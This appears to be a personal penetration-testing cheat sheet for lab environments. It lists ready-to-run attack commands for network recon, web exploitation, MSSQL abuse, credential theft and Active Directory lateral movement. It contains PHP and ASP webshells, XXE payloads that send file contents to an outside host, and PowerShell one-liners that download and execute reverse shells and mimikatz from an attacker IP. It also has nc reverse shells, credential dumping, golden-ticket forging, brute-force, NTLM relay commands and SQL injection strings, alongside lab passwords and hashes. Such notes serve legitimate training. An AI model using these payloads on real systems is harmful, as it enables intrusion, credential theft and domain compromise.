
My Cheat Sheet

SWEEP

fping -asgq 172.16.5.0/24

#nmap
nmap -sn -v 192.168.50.1-253 -oG ping-sweep.txt

Port Scan

rustscan

rustscan -a <IP> --top --ulimit 5000

nmap

# TCP
# 22,21,25,389,3389,135,139,445,80,443,8080,8888,1433,5985,5986,8000
nmap -sT -n -Pn -v -A
nmap -sT -n -Pn -v --top-ports 1000 -A 192.168.50.1-254 
nmap -sT -n -Pn -v -T4 -p- -A
# UDP
nmap -sU -n -Pn -T4 -v --top-ports 500 

# SMB
# NSE script list: /usr/share/nmap/scripts
nmap -p 135,139,445 -n -Pn --script smb-protocols,smb-os-discovery,smb-enum-shares,smb-enum-users,smb-enum-services 
nmap -p 135,139,445 -n -Pn --script smb-vuln-ms17-010,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos,smb-vuln-webexec 

# SMTP
nmap -p 25 --script smtp-enum-users,smtp-commands,smtp-ntlm-info
# POP3
nmap -p 110 --script pop3-capabilities,pop3-ntlm-info 

# LDAP
nmap -p 389 -n -Pn --script ldap-rootdse

# vuln
nmap -n -Pn --script vuln 10.10.10.248

Powershell

# on powershell
Start-Job {1..8000 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.221.151", $_)) "TCP port $_ is open"} 2>$null}
Receive-Job -Id 
Stop-Job -Id 

Recon

Autorecon

source /opt/autorecon/bin/activate
autorecon <CIDR>

SNMP

wget https://raw.githubusercontent.com/SECFORCE/SNMP-Brute/master/snmpbrute.py
python3 snmpbrute.py -t 10.10.11.193

# snmpwalk
snmpwalk -c internal -v2c 10.10.11.193 

SMB

# smbclient
smbclient -N -L \\\\10.129.144.138
smbclient //192.168.226.248/transfer -U htb.local/user%[HASH] --pw-nt-hash
smbclient -L //192.168.171.175 -U V.Ventz --password='HotelCalifornia194!'

timeout 300
mask ""
recurse ON
prompt OFF
mget *


# smbmap
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

DNS

dig @192.168.192.196 matrimony.off any
dig @192.168.192.196 matrimony.off axfr

RPC

rpcclient -U '' -N 10.10.11.4
rpcclient -U user --password=weasal

enumdomains
enumdomgroups
lsaquery
querydominfo
enumdomusers

LDAP

https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap

ldapsearch -x -v -b "DC=hutch,DC=offsec" -H "ldap://192.168.215.122" "(objectclass=*)"
 | grep 'userPrincipalName:' -A 10 -B 40

ldapsearch -x -v -b "DC=hutch,DC=offsec" -D "user@hutch.offsec" -w pass -H "ldap://192.168.215.122" "(ms-MCS-AdmPwd=*)"

https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20User%20Related%20Searches https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20Group%20Related%20Searches https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20Computer%20Related%20LDAP%20Query

Web

App

# nikto
nikto -h http://

# whatweb
whatweb -v http://

subdomain

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http:// -H "Host: FUZZ. " -mc all -fs 111

gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -u http://

dir

# ffuf
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -recursion -recursion-depth 2 -e .aspx,.txt,.pdf,.html,.php -u http://
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt:FUZZ -ic -e .aspx,.txt,.pdf,.html,.php -u http:// 

# dirsearch
dirsearch -u https://

# gobuster
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -k -x aspx,txt,pdf,html,php -u http://
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt -k -x aspx,txt,pdf,html,php -u http://

# Dirb
dirb http://

# wordlist
comm -23 <(sort /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt) <(sort /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt)

WordPress

wpscan --url http://192.168.198.244 --enumerate u
wpscan --url http://192.168.229.174 --enumerate at -t 150
wpscan --url http://192.168.198.244 --enumerate p --plugins-detection aggressive  --plugins-version-detection  aggressive -t 150
wpscan --url http://192.168.198.244 --enumerate ap --plugins-detection mixed --plugins-version-detection  aggressive -t 150

wpscan --url http://192.168.169.121/wordpress/ -U 'loly' -P /usr/share/seclists/Passwords/Common-Credentials/darkweb2017-top1000.txt

endpoint

# katana
katana -u http://

POST Fuzz

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d 'username=admin&password=FUZZ' -u http://
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -request req -u http://

enum4linux

# User enum
enum4linux -u user -p pass -U 172.16.7.3 

Initial Access

https://github.com/swisskyrepo/PayloadsAllTheThings

Path Traversal

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt

# linux
/etc/passwd

/proc/self/cmdline
/proc/1/cwd
/proc/2/environ

/home/offsec/.ssh/id_rsa
/home/offsec/.ssh/authorized_keys
/home/offsec/.ssh/known_hosts

/etc/nginx/nginx.conf
/etc/nginx/modules-enabled/default.conf
/etc/apache2/sites-enabled/000-default.conf
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/var/log/apache2/access.log

/etc/vsftpd.conf
/etc/knockd.conf

# Windows
/Windows/system.ini
/Windows/System32/Drivers/etc/hosts
/Users/ana/.ssh/id_rsa

id_rsa

chmod 400 id_key
ssh -i id_key -p 2222

ssh -i root root@localhost -o IdentitiesOnly=yes
ssh-keygen -t rsa
mv id_rsa.pub authorized_keys
chmod 400 id_rsa

LFI

# page=...

php://filter/resource=admin.php
php://filter/convert.base64-encode/resource=admin.php

data://text/plain;base64,<base64>&cmd=ls

# EXEC
/tmp
/var/crash
/dev/shm

Webshell

/usr/share/webshells

<?php echo(system($_GET["cmd"])); ?>
<?php echo(shell_exec($_GET["cmd"])); ?>
<?php echo(exec($_GET["cmd"]));?>

<?php phpinfo();?>

Dfunc (disable_functions) bypass - php

git clone https://github.com/teambi0s/dfunc-bypasser

asp

<% eval request('cmd') %>

File Upload

htaccess

echo "AddType application/x-httpd-php .tak" > .htaccess

polyglot

exiftool -Comment='<?php echo "START\n"; echo(system($_GET["cmd"])); echo "\nEND"; ?>' unnamed.jpg -o polyglot.php

Wordpress
https://github.com/p0dalirius/Wordpress-webshell-plugin

XXE

<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>

DTD

malicious.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://192.168.1.1/?x=%file;'>">
%eval;
%exfil;

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>

SVG Image

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>

Reverse Shell

https://www.revshells.com/
https://tex2e.github.io/reverse-shell-generator/index.html

Bypass

w'h'o'am'i
w"h"o"am"i

Linux

# /
${PATH:0:1}
${PWD:0:1}
# white
${IFS}
$9
# ;
${LS_COLORS:10:1}

Windows

# \
$env:HOMEPATH[0]

SQLi

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet

' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //

# column count
' ORDER BY 1-- //
' or 1=1 order by 6 #
' UNION SELECT database(), user(), @@version, null, null -- //
' union select 1,group_concat(schema_name),3,4,5,6 FROM information_schema.schemata #
' UNION SELECT null, username, password, description, null FROM users -- //

MSSQL

Inject

test' union select 1,@@version,3,4,5,6--
test' union select 1,DB_NAME(),3,4,5,6--
' union select USER_NAME(),2 -- - //
' union select name,2 FROM sys.databases -- - //
' union select name,2 FROM [DBname].sys.tables -- - //
test' union select 1,name,3,4,5,6 FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')--
test' union select 1,CONCAT(username, ' ', password),3,4,5,6 FROM users--

' union select s.login_name,2 from sys.dm_exec_sessions AS s -- - //
' union select CONCAT(name, ' ', sys.fn_varbintohexsubstring(1, password_hash, 1, 0)),2 from master.sys.sql_logins -- - //

impacket-mssqlclient

https://book.hacktricks.xyz/v/jp/network-services-pentesting/pentesting-mssql-microsoft-sql-server

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202

# help
help

# user enum
SELECT r.name, r.type_desc, r.is_disabled, sl.sysadmin, sl.securityadmin, sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin FROM master.sys.server_principals r LEFT JOIN master.sys.syslogins sl ON sl.sid = r.sid WHERE r.type IN ('S','E','X','U','G');

# impersonate
SELECT name FROM sys.server_permissions JOIN sys.server_principals ON grantor_principal_id = principal_id WHERE permission_name = 'IMPERSONATE';
EXECUTE AS LOGIN = 'sa';
## impacket
enum_impersonate
exec_as_login sa
## revert
REVERT;

# xp_cmdshell
enable_xp_cmdshell
disable_xp_cmdshell

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

# ole automation
EXEC sp_configure 'Ole Automation Procedures', 1
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';

# job
sp_start_job cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"

# trustworthy
## role name and member
enum_db
enum_users
enum_owner
USE [DBname];
SELECT b.name, c.name FROM [DBname].sys.database_role_members a JOIN [DBname].sys.database_principals b ON a.role_principal_id = b.principal_id LEFT JOIN [DBname].sys.database_principals c ON a.member_principal_id = c.principal_id;
EXECUTE AS USER = 'dbo'
## sp_escalate
CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember '[imp_user]','sysadmin'
EXEC sp_escalate
## exec_as_login sa

SELECT * FROM fn_my_permissions(NULL, 'SERVER');

# Link Server list
enum_links
EXEC sp_linkedservers;
## link server
use_link SQL02
use_link localhost
### if RPC error
EXEC master.dbo.sp_serveroption @server = N'Servername', @optname = N'rpc out', @optvalue = N'true';

SELECT * FROM OPENQUERY(SQL02, 'SELECT IS_SRVROLEMEMBER(''sysadmin'')');
EXECUTE ('EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami";') AT SQL02;

# NTLM
responder -I tun0 
cd /usr/share/responder/logs

xp_dirtree \\10.10.14.23\any\thing

SELECT name FROM master.dbo.sysdatabases;
USE master
exec master.dbo.xp_dirtree '\\10.10.14.23\relay'
EXEC master..xp_subdirs '\\10.10.14.23\anything\'
EXEC master..xp_fileexist '\\10.10.14.23\anything\'

# Enum
## SELECT name FROM master.dbo.sysdatabases;
enum_db
USE [DBname];
SELECT * FROM [DBname].INFORMATION_SCHEMA.TABLES;

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL/

Import-Module .\PowerUpSQL.psm1
Get-SQLInstanceDomain -Verbose
Invoke-SQLAudit -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"

ExploitDB

searchsploit -m 42031

shellcode

https://shell-storm.org/shellcode/index.html

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python 

Webdav

cadaver http://

ldap_shell

https://github.com/PShlyundin/ldap_shell

ldap_shell nara-security.com/TRACY.WHITE:zqwj041FGX

TRACY.WHITE# add_user_to_group TRACY.WHITE 'REMOTE ACCESS'

hash_catch

scf, Library-ms, url, lnk

hashgrab

wget https://raw.githubusercontent.com/xct/hashgrab/main/hashgrab.py
python3 hashgrab.py MY_IP test

ntlm_theft

git clone https://github.com/Greenwolf/ntlm_theft
cd ntlm_theft
python3 ntlm_theft.py --generate all --server 10.10.14.8 --filename ntlms

odt

pip install ezodf
wget https://github.com/rmdavy/badodf/raw/master/badodt.py
python3 badodt.py

netexec

nxc smb 172.16.117.3 -u  -p '' -M slinky -o SERVER=172.16.117.30 NAME=important

Other Bypass

X-Forwarded-For: 127.0.0.1

Phishing

webdav

# webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /root/work/webdav
# sendmail
swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.232.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap  

shellter

shellter

Foothold

Linux

Background

nohup python3  &

Interactive shell

# pseudo-tty (spawn a PTY)
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg 
export TERM=xterm
export SHELL=/bin/bash
reset

Windows

SHELL

#nc.exe
cmd.exe /c powershell 

powershell -nop -c "iwr -Uri http://192.168.45.218/nc.exe -Outfile C:\Windows\temp\nc.exe"
C:\Windows\temp\nc.exe 192.168.45.218 4444 -e powershell

# Invoke-PowerShellTcp
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
powershell.exe -nop -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.37 -Port 4444"

# powercat
cd /usr/share/powershell-empire/empire/server/data/module_source/management/
powershell.exe -nop -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/powercat.ps1');powercat -c 192.168.45.185 -p 4444 -e powershell"

# Unrestricted
powershell -ep bypass
Set-ExecutionPolicy Bypass -Force -Scope Process

Client Soft

# SMB
impacket-smbclient intelligence.htb/Tiffany.Molina:NewIntelligenceCorpUser9876@10.10.10.248
smbclient -U tyler \\\\test\\share
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

# psexec
impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
# wmiexec
impacket-wmiexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
# dcomexec
impacket-dcomexec -object MMC20 active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e' -silentcommand
impacket-dcomexec -object ShellWindows active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e' -silentcommand -no-output
impacket-dcomexec -object ShellBrowserWindow active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e' -silentcommand

# evil-winrm
evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"
# atexec
impacket-atexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e'

# TGT and evil-winrm-py
## get TGT
faketime -f '+7h' impacket-getTGT mirage.htb/user:Pass
# config
wget https://gist.github.com/zhsh9/f1ba951ec1eb3de401707bbbec407b98/raw/5a1ecf615cd687926138622c69c618a52466c812/configure_krb5.py
sudo python3 configure_krb5.py mirage.htb dc01
KRB5CCNAME=nathan.aadam.ccache faketime -f '+7h' evil-winrm-py -k --no-pass -i dc01.mirage.htb


## double hop
$SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\backup', $SecPassword)
get-domainuser -spn -credential $Cred

Credential Access

Brute Force

# hydra
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.50.202
hydra -L /usr/share/seclists/Passwords/UserPassCombo-Jay.txt -P /usr/share/seclists/Passwords/UserPassCombo-Jay.txt ftp://192.168.50.202 -f
hydra  -C /usr/share/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt postgres://192.168.175.47 -t 4

# hydra for HTTP
hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/2024-197_most_used_passwords.txt 192.168.172.61 http-get /login -f
hydra -L /usr/share/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:usr=user&pwd=^PASS^:Login failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.172.61 -s 8081 http-post-form '/service/rapture/session:username=^USER64^&password=^PASS64^:F=403' -f

# medusa
sed 's/^/:/' /usr/share/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt > postgres-defaultpasslist.txt
medusa -C postgres-defaultpasslist.txt -h 192.168.175.47 -M postgres -n 5432 
medusa -h 192.168.168.108 -u postgres -P /usr/share/seclists/Passwords/UserPassCombo-Jay.txt -M postgres -n 5432

hashcrack

# MD5-RAW: 0, SHA-256: 1400, NTLM: 1000, NetNTLMv2: 5600, AS-REP: 18200, TGS-REP: 13100, DCC2: 2100
hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt -r /usr/share/john/rules/best64.rule --force
#  Brute-force ASCII 5-9 characters
hashcat -m 1731 -a 3 hash ?a?a?a?a?a --force
## No special characters (?s): custom charset -1 = ?l?u?d
hashcat -m 1731 -a 3 hash -1 ?l?u?d ?1?1?1?1?1?1 --force

# john
john --wordlist=/usr/share/wordlists/rockyou.txt --rules /usr/share/john/rules/best64.rule hash.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt --rules /usr/share/john/rules/best64.rule hash

Windows

netexec

# Module list
nxc ldap -L
## Normal
nxc smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success --local-auth --loggedon-users
nxc smb 192.168.226.189 192.168.226.191 192.168.226.248-249 -u user -H 54abdf854d8c0653b1be3458454e4a3b -d htb.local --continue-on-success
nxc smb 10.129.144.138 -u "guest" -p "" --rid-brute --pass-pol
nxc smb 10.129.144.138 -u user_list -p user_list --no-brute

# SMB share
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --shares
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --spider serviceaccount --regex .
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --share serviceaccount --get-file flag.txt flag.txt

# pass-pol
nxc smb 10.129.204.177  -u '' -p '' --pass-pol

# GPP
## gpp-decrypt cmd
nxc smb 192.168.50.75 -u username -p 'Nexus123!' -M gpp_password
nxc smb 192.168.50.75 -u username -p 'Nexus123!' -M gpp_autologin

# asreproast
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --asreproast asreproast2.out
# kerberoasting
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --kerberoasting kerberoasting.out
# Kerberos Unconstrained Delegation
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --trusted-for-delegation
# No password
nxc ldap 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --password-not-required

# MSSQL
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -M mssql_priv
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -M mssql_priv -o ACTION=privesc
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -x 'whoami'
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth --put-file /usr/share/windows-binaries/nc.exe 'C:/Windows/Temp/nc.exe'
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -q "SELECT name FROM master.dbo.sysdatabases"
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -q "SELECT table_name from interns.INFORMATION_SCHEMA.TABLES"
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -q "SELECT * from [dbname].[dbo].table_name"
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -M mssql_priv -o ACTION=rollback

# sid
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --get-sid
# MS-DS-Machine-Account-Quota
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' -M maq
# gMSA
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --gmsa
# laps
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' -M laps

# secret dump
nxc smb 10.129.204.177 -u username -p 'Nexus123!' --sam
nxc smb 10.129.204.177 -u username -p 'Nexus123!' --ntds --enabled
nxc smb 10.129.204.177 -u username -p 'Nexus123!' --lsa 
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -M lsassy
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -M handlekatz
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -M nanodump
## KeePass
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M keepass_discover
nxc smb 10.129.105.44 -u username -p 'Nexus123!' -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH=C:/Users/CreatePass/KeePass.config.xml
cat /tmp/export.xml | grep -i protectinmemory -5

## Vuln
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M zerologon
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M petitpotam
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M nopac

## Enable RDP
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M rdp -o ACTION=enable
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M rdp -o ACTION=disable

## Ticket
KRB5CCNAME=./administrator.ccache nxc smb test.ja.htb -k --use-kcache -x 'dir C:\Windows\Temp'

PsMapexec

wget https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.108/PsMapExec.ps1')

PsMapExec -Targets All -Domain htb.local -Method SMB -Username user -Hash 9a3121977ee93af56ebd0ef4f527a35e -Command "whoami"

kerbrute

wget https://raw.githubusercontent.com/insidetrust/statistically-likely-usernames/master/jsmith.txt

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /usr/share/seclists/Usernames/Names/names.txt

kerbrute passwordspray ./userlist Password123! --dc 10.10.10.248 -d active.htb 

mimikatz

cd /usr/share/windows-resources/powersploit/Exfiltration/
cd /opt/mimikatz/x64

# PTH
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:htb.local /ntlm:cc36cf7a8514893efccd332446158b1a" "exit"
#PTT
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
.\mimikatz.exe "privilege::debug" "kerberos::ptt c:\ticket\folder" "exit"

# silver ticket
whoami /user
.\mimikatz.exe "kerberos::golden /domain:htb.local /ptt /sid:S-1-5-21-1987370270-658905905-1781884369 /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:Administrator" "exit"

# golden ticket
whoami /user
.\mimikatz.exe "privilege::debug" "kerberos::purge" "kerberos::golden /ptt /user:Administrator /domain:htb.local /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:cc36cf7a8514893efccd332446158b1a" "exit"

# lsadump
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:krbtgt /domain:htb.local" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /all /domain:htb.local" "exit"

# mimidrv.sys load
.\mimikatz.exe "privilege::debug" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt')
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""

SharpKatz

wget https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.5_Any/SharpKatz.exe

# Logonpasswords
.\SharpKatz.exe --Command logonpasswords
# msv
.\SharpKatz.exe --Command msv
# list Kerberos encryption keys
.\SharpKatz.exe --Command ekeys
# dcsync
.\SharpKatz.exe --Command dcsync --Domain domain.com --DomainController dc01.domain.com 

DomainPasswordSpray

wget https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.108/DomainPasswordSpray.ps1')

Invoke-DomainPasswordSpray -Password Winter2022 -ErrorAction SilentlyContinue

AD

impacket

# AS-REP
impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/user:pass
impacket-GetNPUsers HTB.local/ -no-pass -dc-ip 10.10.10.161 -usersfile username.txt -format john -outputfile outhash.txt

# kerberoasting
impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request -save -outputfile tgs.hash
DCsync - secretsdump

https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets

impacket-secretsdump htb.local/userattk:takSecbe987@10.10.10.161 -just-dc
impacket-secretsdump htb.local/userattk:takSecbe987@10.10.10.161 -just-dc-user Administrator -just-dc-ntlm

# SAM
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM local
# ntds.dit
impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY local

Rubeus

# Unconstrained Delegation
# Ticket monitoring
.\Rubeus.exe monitor /interval:5 /nowrap
# Ticket dump
.\Rubeus.exe dump /nowrap
#PTT
## Sacrificial Process 
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\Rubeus.exe asktgs /ticket:BASE64 /service:cifs/dc01.INLANEFREIGHT.local /ptt 
## TGT req
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\Rubeus.exe asktgt /user:gpo_admin /password:'Password123' /domain:inlanefreight.ad /ptt
### TGT renew
.\Rubeus.exe renew /ticket:BASE64 /ptt /nowrap

# Constrained Delegation
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt
## HTTP
Enter-PSSession ws01.inlanefreight.local


# PTT
## Sacrificial Process 
.\Rubeus.exe createnetonly /program:powershell.exe /show
## Ticket list 
.\Rubeus.exe triage
## Ticket Extracting
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
.\Rubeus.exe renew /ticket:doIFVjCCBVKgAwIBBaEDA<SNIP> /ptt

# AS-REP
.\Rubeus.exe asreproast /nowrap /dc:

# Kerberoasting
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /nowrap /format:hashcat /dc:
# RC4
.\Rubeus.exe kerberoast /nowrap /format:hashcat /dc: /tgtdeleg

# Golden Ticket
.\Rubeus.exe golden /rc4:992093609707726257e0959ce3e24771 /domain:dev.inlanefreight.ad /sid:S-1-5-21-2901893446-2198612369-2488268720 /user:Administrator /ptt
## SIDhistory
.\Rubeus.exe golden /sids:S-1-5-21-2879935145-656083549-3766571964-519

Lateral Movement

NTLM Relay

https://github.com/topotam/PetitPotam/blob/main/PetitPotam.py

# Enum target SMB
nxc smb 172.16.117.0/24 --gen-relay-list relayTargets.txt
# Responder
sed -i "s/SMB = On/SMB = Off/; s/HTTP = On/HTTP = Off/" /etc/responder/Responder.conf
responder -I tun0

# ntlmrelayx
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c
impacket-ntlmrelayx -smb2support -tf relayTargets.txt -c

# socks
## SMB
impacket-ntlmrelayx -smb2support -tf relayTargets.txt -socks
## MSSQL
impacket-ntlmrelayx -t "mssql://172.50.0.30" -smb2support -socks

# add computer
impacket-ntlmrelayx -t ldap://172.16.119.3 -smb2support --no-da --no-acl --add-computer 'plaintext$'
# PC account escalate
impacket-ntlmrelayx -t ldap://172.16.117.3 -smb2support --escalate-user 'plaintext$' --no-dump -debug

# start relay
python3 PetitPotam.py -u 'plaintext$' -p 'Password123!' -d 'lab.local' <My_IP> 172.16.119.70
coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
python3 printerbug.py inlanefreight/plaintext$:'MTXr3(GW)lnljOj'@172.16.119.70 <My_IP>
## pipe
python printerbug.py user:'Pass123'@10.0.10.21 10.0.10.21/pipe/test

ESC 8

# HTTP Endpoint
curl -I http://172.16.117.3/certsrv/

# Relay
impacket-ntlmrelayx -t http://172.16.117.3/certsrv/certfnsh.asp -smb2support --adcs --template "Machine"
# Authentication Coercion
## EfsRpcAddUsersToFile, EfsRpcQueryRecoveryAgents
coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
